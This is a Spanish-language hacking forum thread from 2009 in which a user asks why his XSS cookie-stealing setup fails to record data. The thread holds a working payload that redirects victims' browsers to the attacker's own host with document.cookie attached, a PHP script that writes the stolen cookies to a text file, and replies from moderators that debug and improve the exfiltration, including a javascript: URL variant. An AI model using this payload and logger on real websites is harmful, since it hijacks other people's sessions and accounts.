elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS no envia datos		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS no envia datos  (Leído 3,909 veces)
achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
XSS no envia datos
« en: 27 Febrero 2009, 20:40 pm »
uso el siguiente codigo:

Código:
<script>document.location='http://mipagina.com/archivo.php?x='+document.cookie;</script>


donde archivo.php contiene lo siguiente:

Código:
   1.
      <?php
   2.
      $fp = fopen("datos.txt", "a+");
   3.
      $cookie = $_GET['x'];
   4.
      $salto = "\n-----------------------------\n";
   5.
      fwrite($fp,$salto);
   6.
      fwrite($fp,$cookie);
   7.
      fclose($fp);
   8.
      ?>

Pero si el archivo php está hospedado en un servidor funciona y en otro no. En el que no funciona le di todos los permisos a la carpeta (777) y a los archivos que contiene para que pueda almacenar los datos, pero solo guarda la linea punteada "$salto", porqué puede suceder esto?

cuando la pagina vulnerable se redirecciona, en la url se ve todo el contenido de la cookie por document.cookie, pero estos datos no son tomados para ser escritos
« Última modificación: 27 Febrero 2009, 20:41 pm por achernar_ » En línea
Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: XSS no envia datos
« Respuesta #1 en: 27 Febrero 2009, 22:16 pm »
haz escape(document.cookie) y asegurate que las cookies sean "leibles" por javascript.
En línea
Leer reglas
- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
achernar_

Desconectado Desconectado

Mensajes: 117



Ver Perfil
Re: XSS no envia datos
« Respuesta #2 en: 28 Febrero 2009, 20:04 pm »
El problema no son las cookies, porque en algunas paginas de webhosting el codigo php recibe la cadena con las cookies perfectamente, pero en otras no. Pensé que podria ser un  problema común, pero igual muchas gracias sirdarckcat.
En línea
Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
niñoweb

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: XSS no envia datos
« Respuesta #3 en: 1 Marzo 2009, 05:06 am »
Mira creo que vi el error.

document.location estas trabajando sobre el documento

prueba con window.location :)

osea solo cmbia la palara document por window

:)
En línea
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: XSS no envia datos
« Respuesta #4 en: 1 Marzo 2009, 11:13 am »
jajaja eso no tiene nada que ver..
En línea
Leer reglas
- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: XSS no envia datos
« Respuesta #5 en: 1 Marzo 2009, 23:39 pm »
Hay algunos servidores gratuitos y otros de pago donde por defecto traen un filtro bién pobre y molestoso, por ejemplo si usaste una variable llamada "act" en get entonces no te funcionará porque lo mas seguro es que te aparezca acceso denegado (asi pretenden evitar  una c99  :rolleyes:), en ese caso trata de cambiarlo. Intenta hacer pruebas tu mismo y haz esto:

Código
  1. <?php
  2.  
  3.  die('Test: '.nl2br(htmlspecialchars($_GET['x'], ENT_QUOTES)));
  4.  
  5.  $fp = fopen("datos.txt", "a+");
  6.  $cookie = $_GET['x'];
  7.  $salto = "\n-----------------------------\n";
  8.  fwrite($fp,$salto);
  9.  fwrite($fp,$cookie);
  10.  fclose($fp);
  11. ?>

Luego vas probando...
Citar
cookies.php?x=prueba
Te debe aparecer "prueba", luego intentas con una cookie y vas a google y escribes arriba tu redirección y vas viendo que te aparece:
Citar
javascript:document.location='http://www.miweb.com/cookies.php?x='+document.cookie;

Si te aparece biéne toda la cokie y las demás cosas en cookies.php entonces significa que tienes rpoblemas al escribir sobre el archivo, intenta reemplazar "a+" por "x" en el fopen.
En línea
- https://yhojann.cl/ - https://whk.cl/
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[SOLUCIONADO]a qué velocidad viajan los datos que envia una pc?
Redes 		SuperNovato 5 8,887 Último mensaje 6 Enero 2011, 21:54 pm
por SuperNovato
OutputStream, write() no envia los datos
Java 		xmbeat 0 2,092 Último mensaje 28 Junio 2012, 04:36 am
por xmbeat
En 24 horas un smartphone envia 350.000 paquetes de datos y contacta con ....
Noticias 		wolfbcn 1 2,686 Último mensaje 24 Noviembre 2013, 21:20 pm
por Eleкtro
Nueva tecnología envía los datos a la velocidad de la luz
Noticias 		wolfbcn 0 1,638 Último mensaje 12 Diciembre 2013, 18:36 pm
por wolfbcn
[Duda] Saber si mi ordenador envia datos a IPs (robo de datos).
Seguridad 		AlbertoPerez 1 2,923 Último mensaje 4 Agosto 2017, 03:09 am
por Randomize
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines